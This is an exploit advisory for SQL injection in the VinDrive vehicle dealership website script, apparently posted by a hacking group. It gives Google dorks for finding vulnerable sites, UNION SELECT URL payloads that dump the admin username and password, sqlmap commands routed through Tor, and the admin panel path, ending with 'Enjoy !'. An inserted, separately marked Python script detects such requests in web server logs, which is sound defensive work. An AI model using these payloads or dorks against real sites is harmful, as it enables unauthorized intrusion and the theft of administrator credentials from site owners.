##########################
# Exploit Title: VinDrive SQL Injecti0n Vulnerability - Manually AND sqlmap
# Google Dork 1: " allinurl:search/make_offer_form.php?id= "
# Google Dork 2: " VinDrive inurl:/search/results.php "
# Google Dork 3: " inurl:results.php?_s_col= "
# Script Name: VinDrive - Vehicle Marketing System - Dealership website www.dealerwebsites.com
# Date: 12-09-2016
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Discovered By: Hacker Khan
# Tested on : Windows
##########################
######[ Exploit ]###### (( Manually ))
To see the column numbers : ( they will be 3,4,5 )
make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38
To see the database name : ( the database name will be : dealer62_XXX ( SOMENAME ) )
make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38
To see the admin username and password : ( replace XXXX with the name of the database )
make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 from dealer62_XXXX.cars_dealers
----------- DONE -------------
######[ Exploit ]###### (( SQLMAP ))
sqlmap -u "http://www.Target/search/details.php?id=511" -v 1 --random-agent --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor --dbs
sqlmap -u "http://www.Target/search/details.php?id=511" -v 1 --random-agent --tor --tor-type=SOCKS5 --tor-port=9050 --check-tor -D dealer62_XXXX --tables -T cars_dealers -C username,password --dump
----------- DONE -------------
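Added example (not part of the original advisory and not VinDrive's own code): a log check a site operator can run to find requests like the ones above in web server access logs, including the mixed-case keywords. It assumes Combined Log Format and that legitimate id values are plain non-negative integers; the sample log lines and addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoints named in the advisory. Assumption: a legitimate "id" is digits only.
WATCHED = ("/search/make_offer_form.php", "/search/details.php")
# Request field of a Combined Log Format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Case-insensitive, so mixed-case keywords such as "uNion" still match.
SQL_RE = re.compile(r"\bunion\b.*\bselect\b|\bdatabase\s*\(|\bconcat\s*\(",
                    re.I | re.S)

def classify(target):
    """Return None for a clean request, else a short reason string."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(WATCHED):
        return None
    # parse_qs decodes %xx escapes and turns "+" into a space.
    for value in parse_qs(parts.query, keep_blank_values=True).get("id", []):
        if SQL_RE.search(value):
            return "sql-keywords-in-id"
        if not re.fullmatch(r"\d{1,10}", value):
            return "non-numeric-id"
    return None

def scan(lines):
    """Yield (client_ip, reason, target) for each suspicious log line."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        reason = classify(m.group(1))
        if reason:
            yield line.split(" ", 1)[0], reason, m.group(1)

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Sep/2016:10:00:01 +0000] "GET /search/details.php?id=511 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [12/Sep/2016:10:00:07 +0000] "GET /search/make_offer_form.php?id=-511+uNion+aLL+SeLeCt+1,2,3 HTTP/1.1" 200 4096',
    '192.0.2.44 - - [12/Sep/2016:10:00:09 +0000] "GET /search/details.php?id=511%27 HTTP/1.1" 500 310',
    '192.0.2.10 - - [12/Sep/2016:10:00:12 +0000] "GET /search/results.php?_s_col=price HTTP/1.1" 200 9000',
]

if __name__ == "__main__":
    for ip, reason, target in scan(SAMPLE_LOG):
        print(ip, reason, target)
```

A hit on either endpoint is a reason to review the surrounding requests from the same client and to rotate the admin credentials the advisory says are stored in cars_dealers.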
ADMIN PAGE :
http://www.TarGet/search/admin/
Enjoy !
tested on :
###################################
#Thanks to : MR.Khatar || ll_azab-siyah_ll || Blackwolf_Iran ||Ormazd ||Sh@d0w ||mohammad Pn ||Shdmehr ||
And All Of Iranian Anonymous .